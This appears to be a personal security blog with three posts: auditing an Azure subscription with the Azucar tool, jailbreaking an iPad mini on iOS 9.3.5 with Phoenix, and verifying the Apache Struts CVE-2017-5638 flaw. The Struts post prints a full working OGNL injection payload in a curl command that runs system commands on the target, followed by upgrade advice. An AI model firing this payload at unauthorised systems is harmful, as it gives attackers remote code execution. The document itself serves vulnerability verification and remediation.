Tuesday, September 17, 2019

Azure configuration Check (part 1)

Part 1: Use azucar tool

Azucar is a multi-threaded plugin-based tool to help assess the security of Azure Cloud environment subscription. By leveraging the Azure API , Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.

The script will not change or modify any asset deployed in the Azure subscription.
More details on https://github.com/nccgroup/azucar/

Requirement:


  1. Windows 10, 1903
  2. An Azure read-only account
  3. Excel 2016 if you want to export excel format report

Steps


  1. Download and install Git for Windows from https://gitforwindows.org/ using default options. If you have git installed on your system, you can skip this step.
  2. Run a command line window. On your folder, run command: git clone https://github.com/nccgroup/azucar.git
  3. Run a powershell window as administrator, go to the “azucar” folder.
  4. Run command “$psversiontable”, make sure the powershell version is 3.x
  5. Run command: “Get-ChildItem -Recurse c:\tools\azucar | Unblock-File” to unblock the files
  6. Run command “.\Azucar.ps1 -ExportTo EXCEL,CSV,XML,JSON -Verbose -Instance AzureCloud -Analysis All”. it will popup a window to ask you to sign in.
  7. Enter the Azure email and password. Click “sign in” button. Select the Subscription and click “OK” button. 
  8. Wait until the analysis process ended, you can find the reports on folder “azucar\report”

References:


  1. https://github.com/nccgroup/azucar/
  2. https://gitforwindows.org/


Friday, August 11, 2017

iPad mini 1 ios 9.3.5 Phoenix Jailbreak

Enviroment:
1. iPad mini 1: A1432; IOS version 9.3.5
2. Kali Linux 2017.1 (64bit)

Steps:
1. Download Cydia Impactor from http://www.cydiaimpactor.com/ and unzip it. what I used was Linux 64 bit version. (Pic01)

2. Donwload the IPA file Phoenix3.ipa from https://phoenixpwn.com/download.php and put it to the unzip folder (Impactor64_0.9.41). (pic02)

3. Check the hash of the IPA file. It should be "616ef9da4796ae7d490fb7b0e31cd85bb48e2732d2436c7710e79716e2b80e61" (pic03)

4. Connect the iPad mini 1 to Kali Linux.You should see the iPad icon on the desktop. (pic04)

5. Double click "Impactor". The device should be loaded automatically (pic05)

6. Click "Device"->"install Package..." (pic06)

7. Select "Phoenix3.ipa" and click "Open" (pic07)

8. Enter the apple id and password (pic08)

9. The installation will start. (pic09)

10. if you get an error "Provision.cpp:81, ios/submitDevelopmentCSR = 7460 You already have acurrent iOS Development certificate or a pending certificate request"(pic10), then click "xcode"->"revoke certificate" (pic10-2)


11. After the installation is done, you should get the Phoenix icon on your iPad.(pic11)


12. Go to "Settings > General > Device Management" and trust the certificate. (pic12)

13. Run the app and tap on "Prepare For Jailbreak". Following the screen instruction to install Cydia. (pic13)

14. Now you can run Cydia. (pic14)


Please note:
1. Whenever you reboot, open the app again and tap on "Kickstart Jailbreak".
2. Whenever the app expires, install it again with Cydia Impactor.

References:
1. https://phoenixpwn.com/

Friday, July 21, 2017

How to verify CVE-2017-5638 Apache Struts Jakarta Multipart Parser RCE

1.       Nessus Description

The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type header. An unauthenticated, remote attacker can exploit this, via a specially crafted Content-Type header value in the HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.


2.       Example of the vulnerable link


1) https://x.x.x.x:8443/service/login.action.


3.       Verification Steps

1)      Below command shows the result of ifconfig command on the remote host:
curl --header "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','ipconfig','/all'}:{'bash','-c','ifconfig'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" https://x.x.x.x:8443/service/login.action  --insecure

           

4.       Metasploit module




5.       Recommendation

1)      Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.
2)      Alternatively, apply the workaround referenced in the vendor advisory.

6.       References:

1)     https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1
2)     https://cwiki.apache.org/confluence/display/WW/S2-045
3)     http://www.securityfocus.com/bid/96729
4)     http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5638
5)     https://www.rapid7.com/db/modules/exploit/multi/http/struts2_content_type_ognl